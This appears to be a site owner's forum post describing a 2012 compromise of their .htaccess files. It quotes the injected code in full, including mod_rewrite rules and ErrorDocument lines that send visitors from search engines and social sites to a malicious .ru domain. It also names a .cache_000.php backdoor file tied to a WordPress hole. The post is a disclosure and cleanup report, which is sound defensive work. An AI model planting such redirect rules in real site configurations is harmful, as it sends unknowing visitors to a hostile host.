At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
and
ErrorDocument 400 http://2012medis.ru/cocumber?4 ErrorDocument 401 http://2012medis.ru/cocumber?4 ErrorDocument 403 http://2012medis.ru/cocumber?4 ErrorDocument 404 http://2012medis.ru/cocumber?4 ErrorDocument 500 http://2012medis.ru/cocumber?4I corrected the problem by removing the injected code from my existing files and deleting the one's that were added which I identified quickly as being 1.57 KB (1,608 bytes)
-UPDATE-
It may be related to a file called ".cache_000.php" injected via a vulnerability with Wordpress. Look in your /wp-content/uploads/ directory for .cache_000.php
For me the file had the same timestamp as some of the .htaccess files did.
-UPDATE-
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated Wordpress.
-UPDATE-
Update Wordpress or make the .cache_000.php file not accessible
